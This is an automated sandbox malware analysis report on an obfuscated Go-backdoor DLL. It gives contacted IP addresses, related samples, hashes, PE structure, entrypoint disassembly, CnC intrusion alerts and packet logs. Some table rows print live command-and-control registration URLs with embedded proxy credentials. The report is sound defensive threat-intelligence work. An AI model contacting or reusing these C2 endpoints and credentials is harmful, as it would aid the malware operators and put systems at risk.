94.103.90.9	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.224.56	unknown	Russian Federation	42429	TELERU-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1490750
Start date and time:	2024-08-09 19:27:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
Detection:	MAL
Classification:	mal88.troj.evad.winDLL@14/1@0/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.142.74.28	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
77.238.229.63	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0Amd.uww2FVQ&md5=923ec5c02989f28b859f51c6956b5ad1&proxyPassword=acoplus&proxyUsername=acoplus&userId=4Sq6S3QBDg2k0LXayTco4Skn
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELERU-ASRU	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	QTmGYKK6SL.exe	Get hash	malicious	Unknown	Browse	77.238.224.125
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
VTSL1-ASRU	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.73.198
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.73.198
TELERU-ASRU	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	QTmGYKK6SL.exe	Get hash	malicious	Unknown	Browse	77.238.224.125
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
VDSINA-ASRU	SecuriteInfo.com.Win32.Malware-gen.26009.9463.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38
	mips.elf	Get hash	malicious	Unknown	Browse	94.103.91.233
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	195.2.70.38
	BFDFC7BDB3890683E8D3B5F3D9CAE5048DE3CBEDEBF223E4B9B732B096917BEB.exe	Get hash	malicious	Bdaejec, Panda Stealer, Phoenix Stealer	Browse	95.142.46.35
	kz7iLmqRuq.exe	Get hash	malicious	Quasar	Browse	195.2.76.207
	GN03tfEgsB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	178.208.86.27
	file.dll	Get hash	malicious	Unknown	Browse	62.113.116.83
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	408
Entropy (8bit):	6.258258296408273
Encrypted:	false
SSDEEP:	6:LyMGXUN9cIkx3EnVMaP4/lR5+PBZu6jUkl3Lfll/FnaakdFgRDxa4Q:LyW2hy+aQ/f5+nDginaPoIJ
MD5:	05C73EE3A3D6540D8703EC6609C3989B
SHA1:	7C893E974E3B02DB59255DD1A37C352C6C0E47B8
SHA-256:	6F81160426E38E892426333BE9F683242FB4C0EC3BA1C84FA5CA2F623646DA77
SHA-512:	CD8902F3D642E6E1BBD2F4B286F80611EFA3638E7D55651F76ABD379E5F45CCAD98597BF8D354FE336850339CFC59B32F6E6C3EB668546606308BCBED2B657B2
Malicious:	false
Reputation:	low
Preview:	..!P.W.Y......=!S.V A).RL\(VX6"#WW8"V5..GV..\>.PM.95^_+.^.Z.M...ZT$(V7P^OX._.&"...=.^....!(T.+.L'].F>,.W..R..G)-._...W.V.[.(.@.ZT.:.]2;.@U_^Q7=5Q.T.BU..>.W.5.\....."..SRT.A,""L.V?^ .VY/%.M-.3[)5:]%.3[..>G.06\^..Q._?]1&8@<].V#[._./(B2 ..].P.....2#+..[+S.Z!A" QL.=5^ .7Y.Q.M7YS[S4.].3S[<>G?..\.:.QW.QP..[@...U.(SZ)PYB.-......W)+..9,.._3S=3.A_..L?#.^=/&Y(].M8;.[7"$].<.[V./G.9%\.3.V...Y4[.@1..R. ![34.]4^7

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.902846676225024
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
File size:	15'196'072 bytes
MD5:	ff432e4003e9d7135a97bd4dc0445dc3
SHA1:	41530cb367ca6b69378179b4bba91deaf7d3a342
SHA256:	03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
SHA512:	adfa35738774d096bcbe5891ed51bdd813d797f828a0c90748a5f6cb82b7a8a5a82656843d2387ed906bbaee6dec24b4a3f5ec910a614c728002a9d798480f27
SSDEEP:	393216:fRdW64cosTowwMzcG5FU90WGqNyW8O9hHZUSStMbZlna4:T6gozccuLoNyW8evUSs2
TLSH:	7DE633DA3ECF00E6E68119F4DB1717D717F3955A89C688382ACD3945A0A0FB7106F8E6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...$........N...,l.........................p............@... .........................a..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x6db924fd
Entrypoint Section:	TUaYW
Digitally signed:	true
Imagebase:	0x6c2c0000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x6db7a85d, 0x6c7abd60, 0x6c7abd10
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6c871eb5afcc648e749d578ab8277277

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	26/10/2021 17:14:19 26/10/2024 17:14:19
Subject Chain	E=support@electronic.us, CN="Electronic Team, Inc.", O="Electronic Team, Inc.", STREET=901 N Pitt St Ste 101, L=Alexandria, S=Virginia, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Virginia, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=08345597, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	CC3D074101D5D8042D1F46EBFE30DEB6
Thumbprint SHA-1:	E98084272092F2202AF66578B6080FD1FFF73E6A
Thumbprint SHA-256:	9598F039F33B2F8F962F76838DE0B6CCDAA1D6DBA0034498FB1CA5DBCCC23F7E
Serial:	3BF56A3A410BD027F7F4CDCB

Entrypoint Preview

Instruction
push ebx
push C71FF0ACh
pushfd
mov ebx, dword ptr [esp+04h]
add bl, byte ptr [esp+ebx+38E00F59h]
mov byte ptr [esp+ebx*2+71C01ECCh], FFFFFF80h
seto bl
shr ebx, 22h
cmove ebx, dword ptr [esp+04h]
mov ebx, dword ptr [esp+08h]
mov dword ptr [esp+08h], 9664119Fh
push dword ptr [esp+00h]
popfd
lea esp, dword ptr [esp+08h]
call 00007FC2C809363Bh
dec esi
mov dword ptr [ebx+esi-01EE6FE8h], edx
inc ecx
bt ebp, FFFFFF9Fh
inc cx
rol edi, FFFFFFEFh
inc esp
xchg dh, ah
dec esp
lea edi, dword ptr [esp+ebx-01EE6F7Ch]
dec ecx
mov esi, dword ptr [edi+ebx*2-03DCDFB8h]
dec eax
bts edx, ecx
dec eax
xadd edx, ebx
push ebp
dec esp
mov esp, esi
jng 00007FC2C882FC1Ch
call 00007FC2C7ED4A69h
inc ecx
mov ebp, BB944C2Ah
dec ebp
mov ebp, dword ptr [esi]
inc ecx
mov edx, 86AD04ACh
dec ebp
mov edi, dword ptr [esi+08h]
inc ebp
movzx ecx, dl
dec edx
lea ebp, dword ptr [C5B6758Dh+ecx*8]
inc ecx
inc cl
dec ebp
add ebp, edi
mov ebx, C08F0A18h
dec ebp
mov edx, ebp
inc eax
movzx edx, ch
movsx eax, dx
inc ebx
mov esi, dword ptr [esi+ecx*8-00000558h]
and bl, 00000028h
inc ebx
mov dword ptr [edx+ecx*2-0000015Ah], esi
dec edi
mov ecx, dword ptr [eax+eax+00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xf61bfc	0x61	TUaYW
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1188d54	0x3c	TUaYW
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe78200	0x5da8	f^Ycc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1db6000	0x4f0	SZVZY
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1a86be4	0x18	TUaYW
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf3d000	0x10	cUfXW
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
becb`	0x1000	0x4ec4a8	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
[e[fe	0x4ee000	0x2cf6c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
^^STU	0x51b000	0x2ae2d4	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
bY^eU	0x7ca000	0x36090	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
a_SfU	0x801000	0x61	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Y\d^_	0x802000	0x9c0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
T]^[_	0x803000	0x2c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eZ]e\	0x804000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
f^Ycc	0x805000	0x737ca7	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
cUfXW	0xf3d000	0x2c	0x200	b7d30e9ed02236d72d9c14b9fe372f23	False	0.044921875	data	0.15517757530476972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
TUaYW	0xf3e000	0xe77480	0xe77600	6a543533a21a260f56802b83396d908a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
SZVZY	0x1db6000	0x4f0	0x600	73dc1c0d98e44233a766a4be4bfd4864	False	0.4524739583333333	data	3.9980226791839693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler
msvcrt.dll	__mb_cur_max

Exports

Name	Ordinal	Address
MainFunc	1	0x6c7a6460
_cgo_dummy_export	2	0x6cabf64c

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-09T19:28:49.448134+0200	TCP	2855536	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1	1	49739	26395	192.168.2.4	94.103.90.9
2024-08-09T19:28:49.429828+0200	TCP	2855539	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2	1	26395	49739	94.103.90.9	192.168.2.4
2024-08-09T19:29:19.090843+0200	TCP	2855538	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1	1	26395	49739	94.103.90.9	192.168.2.4
2024-08-09T19:29:18.867934+0200	TCP	2855537	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2	1	49739	26395	192.168.2.4	94.103.90.9

Network Port Distribution

Total Packets: 139
• 26395 undefined
• 80 (HTTP)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 19:28:46.855180979 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:46.861253977 CEST	80	49736	195.2.70.38	192.168.2.4
Aug 9, 2024 19:28:46.861398935 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:46.922494888 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:46.932054043 CEST	80	49736	195.2.70.38	192.168.2.4
Aug 9, 2024 19:28:47.557013988 CEST	80	49736	195.2.70.38	192.168.2.4
Aug 9, 2024 19:28:47.611175060 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:28:47.616180897 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:28:47.616312027 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:28:47.706377029 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:28:47.711704016 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:28:47.770724058 CEST	80	49736	195.2.70.38	192.168.2.4
Aug 9, 2024 19:28:47.770808935 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:48.350313902 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:28:48.394496918 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:28:48.756526947 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:48.763128042 CEST	80	49736	195.2.70.38	192.168.2.4
Aug 9, 2024 19:28:48.763267994 CEST	49736	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:28:48.797468901 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:28:48.802651882 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:28:48.802725077 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:28:49.429827929 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:28:49.448133945 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:28:49.453099966 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:04.478336096 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:04.483653069 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:09.428085089 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:09.432033062 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:09.439517975 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:18.494987965 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:29:18.500282049 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:29:18.867933989 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:18.872889042 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:19.090842962 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:19.183721066 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:29.659264088 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:29.662086010 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:29.667146921 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:44.678528070 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:44.684020996 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:48.694083929 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:29:48.847223043 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:29:49.116229057 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:49.121613026 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:49.340087891 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:49.382601976 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:49.886349916 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:29:49.899842024 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:29:49.904906988 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:04.969355106 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:04.974642992 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:10.700602055 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:10.700959921 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:10.701118946 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:10.701940060 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:10.702054977 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:10.704436064 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:10.710345030 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:18.427011013 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:18.432965994 CEST	80	49737	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:18.433089972 CEST	49737	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:19.408080101 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:19.416441917 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:19.642014027 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:19.784327030 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:30.930916071 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:30.940964937 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:30.945993900 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:46.082102060 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:46.087297916 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:49.668631077 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:49.674179077 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:49.674562931 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.679639101 CEST	80	49743	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:49.679718018 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.683842897 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.688947916 CEST	80	49743	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:49.767260075 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.773288965 CEST	80	49744	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:49.773365021 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.774321079 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:49.779660940 CEST	80	49744	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:49.892035007 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:49.971206903 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:50.384175062 CEST	80	49743	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:50.384959936 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.390227079 CEST	80	49745	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:50.390374899 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.391410112 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.396806002 CEST	80	49745	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:50.469809055 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:50.488085032 CEST	80	49744	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:50.488970041 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.494009972 CEST	80	49746	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:50.494080067 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.495434999 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:50.500657082 CEST	80	49746	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:50.573863983 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:51.081151962 CEST	80	49745	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:51.081978083 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.087675095 CEST	80	49747	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.087748051 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.088288069 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.093379021 CEST	80	49747	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.164448023 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:51.164659023 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:30:51.169985056 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:30:51.180802107 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:51.205766916 CEST	80	49746	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:51.206717968 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.213422060 CEST	80	49748	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.213505030 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.213885069 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.219837904 CEST	80	49748	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.370378017 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:51.686045885 CEST	80	49747	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.687119007 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.692137003 CEST	80	49749	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:51.692239046 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.693206072 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.698168993 CEST	80	49749	77.238.229.63	192.168.2.4
